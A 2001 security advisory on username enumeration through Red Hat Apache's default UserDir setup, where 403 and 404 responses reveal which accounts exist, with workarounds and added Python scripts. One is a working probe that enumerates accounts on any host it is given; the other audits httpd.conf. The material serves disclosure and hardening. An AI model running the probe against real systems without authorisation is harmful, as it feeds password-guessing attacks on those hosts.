
Red Hat Linux Apache Remote Username Enumeration

by Phiber on September 19th, 2001

Versions of the Apache web server shipped with Red Hat Linux 7.0 (and possibly other Apache distributions) install with a default misconfiguration that lets a remote user determine whether a given username exists on the vulnerable system.


This is easily shown by entering the following into a web browser, with username replaced by the account to test:

http://www.example.com/~username


When a remote user requests a candidate account's default home page in this way, the server returns one of three responses:


If username is a valid account and has a home page configured, the server responds with that home page (status 200).


If username exists on the system but no home page document has been set up for it, the server returns a 403 Forbidden response with the message "You don't have permission to access /~username on this server."


If username does not exist as an account on the system, the server instead returns a 404 Not Found response with the message "The requested URL /~username was not found on this server."


Because the server responds differently in the latter two cases (403 versus 404), a remote user can test candidate names one by one and enumerate the valid accounts. The status code alone carries the signal, so a custom error page does not help unless the status is hidden as well. Properly exploited, a confirmed list of local usernames feeds directly into password guessing and other attacks on the vulnerable host.
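The enumeration described above, as an added example (not code from the original advisory): a small Python probe that classifies the status code of GET /~name/ into the advisory's three cases and walks a candidate list. The hostnames, ports and candidate names are assumptions, and the fake server at the bottom is a constructed stand-in for the misconfigured Apache so the script can be run offline; it is not Apache and only imitates the three responses the text describes.

```python
"""Probe Apache mod_userdir for the 403-versus-404 difference described above.

Added example, not part of the original advisory. Hosts, ports and the
wordlist are assumptions; the fake server below is constructed so the
probe can be exercised offline and is not Apache."""
import http.client
import http.server
import sys
import threading

USER_WITH_HOMEPAGE = "user_with_homepage"     # 200: ~user's page served
USER_NO_HOMEPAGE = "user_without_homepage"    # 403: account exists, no page
NO_SUCH_USER = "no_such_user"                 # 404: no such account
UNKNOWN = "unknown"                           # anything else, e.g. 302


def classify(status):
    """Map the HTTP status of GET /~name/ to the advisory's three cases.
    Only the status matters; the stock error bodies quoted in the text
    merely accompany it."""
    return {200: USER_WITH_HOMEPAGE, 403: USER_NO_HOMEPAGE,
            404: NO_SUCH_USER}.get(status, UNKNOWN)


def probe(host, port, username, timeout=5):
    """Fetch /~username/ (the trailing slash avoids the 301 mod_dir would
    add for an existing directory) and return the status code."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", "/~%s/" % username)
        return conn.getresponse().status
    finally:
        conn.close()


def enumerate_users(host, port, candidates):
    """Return {name: verdict} for every candidate the server admits exists."""
    found = {}
    for name in candidates:
        verdict = classify(probe(host, port, name))
        if verdict in (USER_WITH_HOMEPAGE, USER_NO_HOMEPAGE):
            found[name] = verdict
    return found


# --- constructed stand-in for the misconfigured server (not Apache) -------
FAKE_ACCOUNTS = {"alice": True, "bob": False}   # name -> has a home page?


class _FakeUserDir(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        name = self.path.strip("/").lstrip("~")
        if name not in FAKE_ACCOUNTS:
            self.send_error(404, "The requested URL %s was not found on this server." % self.path)
        elif not FAKE_ACCOUNTS[name]:
            self.send_error(403, "You don't have permission to access %s on this server." % self.path)
        else:
            body = b"<html>alice's home page</html>"
            self.send_response(200)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_fake_server():
    """Serve the fake on an ephemeral loopback port; returns (server, port)."""
    server = http.server.HTTPServer(("127.0.0.1", 0), _FakeUserDir)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


if __name__ == "__main__":
    if len(sys.argv) >= 2:                      # python3 probe.py host [port]
        host = sys.argv[1]
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    else:                                       # no target given: use the fake
        _server, port = start_fake_server()
        host = "127.0.0.1"
    for name, verdict in sorted(enumerate_users(host, port, ["alice", "bob", "carol", "root"]).items()):
        print(name, verdict)
```

Run it with no arguments to see the fake server give up alice and bob while carol and root stay silent, or point it at a real host to test your own configuration. On a server where UserDir has been disabled every name comes back 404, and on one where both error documents redirect every miss comes back 302; in both cases enumerate_users returns nothing, which is the result you want to see after applying the fix.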


Solution:

  • Workaround 1:

    Disable the UserDir directive, which the Red Hat configuration enables by default, by appending an overriding line to httpd.conf (when the directive appears more than once, the last one wins) and restarting the server. Both steps need root. The path below is the one this advisory gives; adjust it if your httpd.conf lives elsewhere.


    # echo 'UserDir Disabled' >> /var/www/conf/httpd.conf

    # apachectl restart


    With UserDir disabled, every /~username request returns 404, so existing and non-existing accounts are no longer distinguishable.

  • Workaround 2:

    If UserDir must stay enabled, make the 403 and 404 responses identical by pointing both ErrorDocument directives at the same document. Use a full URL rather than a local path such as /sample.html: for a full URL Apache answers the error with a 302 redirect to that URL, so the client sees the same status code and the same page in both cases, whereas a local path keeps the original 403 or 404 status and the difference survives. The URL must be one the remote client can reach, so use the server's public hostname, not localhost (a client following a redirect to http://localhost/ would connect to its own machine).


    # echo 'ErrorDocument 404 http://www.example.com/sample.html' >> /var/www/conf/httpd.conf

    # echo 'ErrorDocument 403 http://www.example.com/sample.html' >> /var/www/conf/httpd.conf

    # apachectl restart


    Note that either workaround only hides accounts without a home page; an account that publishes a home page under /~username is still visible, by design.
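To check whether a given httpd.conf still leaves mod_userdir in play for a name after the workaround, here is an added Python audit (not from the advisory) that evaluates the UserDir rules Apache 1.3 applies: the last directory value wins, `UserDir disabled` with no names switches the feature off except for names in a `UserDir enabled` list, `UserDir disabled name...` switches it off for those names only, and when no directive is present the compiled-in default of public_html applies. The two configuration texts are constructed for the example. The parser only looks at the global scope and ignores Include files and VirtualHost blocks, an assumption a real audit must not make.

```python
"""Evaluate what Apache 1.3's mod_userdir would do with /~username under a
given httpd.conf, to compare the shipped default with the workaround.

Added example, not from the advisory. The config texts are constructed.
Assumption: only global-scope directives matter (Include and <VirtualHost>
are ignored), and the 1.3 compiled-in default of public_html applies when
no UserDir line is present."""

DEFAULT_USERDIR_1_3 = "public_html"   # Apache 1.3 default when no directive is set

# Constructed: the default-style configuration the advisory complains about.
VULNERABLE_CONF = """\
# shipped configuration (constructed for this example)
UserDir public_html
"""

# Constructed: the same file after workaround 1, plus an optional allow-list
# re-enabling only the accounts that are meant to publish pages.
HARDENED_CONF = """\
UserDir public_html
# appended by workaround 1; later directives win
UserDir disabled
UserDir enabled alice
"""


def parse_userdir(conf_text):
    """Return (directory, globally_disabled, enabled_names, disabled_names)
    from the UserDir lines of a configuration text."""
    directory = None
    globally_disabled = False
    enabled, disabled = set(), set()
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) < 2 or parts[0].lower() != "userdir":
            continue
        keyword, names = parts[1].lower(), parts[2:]
        if keyword == "disabled":
            if names:
                disabled.update(names)
            else:
                globally_disabled = True
        elif keyword == "enabled":
            if names:
                enabled.update(names)
            else:
                globally_disabled = False
        else:
            directory = parts[1]
    return directory, globally_disabled, enabled, disabled


def userdir_consulted(conf_text, username):
    """True if mod_userdir would try to map /~username for this name, which
    is the precondition for the 403-versus-404 difference. False means it
    declines, and every such name then gets the same 404."""
    directory, globally_disabled, enabled, disabled = parse_userdir(conf_text)
    if directory is None:
        directory = DEFAULT_USERDIR_1_3   # absence of the directive is not "off"
    if globally_disabled:
        return username in enabled
    return username not in disabled


if __name__ == "__main__":
    for label, conf in (("vulnerable", VULNERABLE_CONF), ("hardened", HARDENED_CONF)):
        for name in ("alice", "bob", "nosuchuser"):
            print(label, name, userdir_consulted(conf, name))
```

The point of the check is the last branch: an httpd.conf with no UserDir line at all is not safe on Apache 1.3, because the module falls back to public_html, which is exactly why "UserDir Disabled" has to be written out explicitly.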

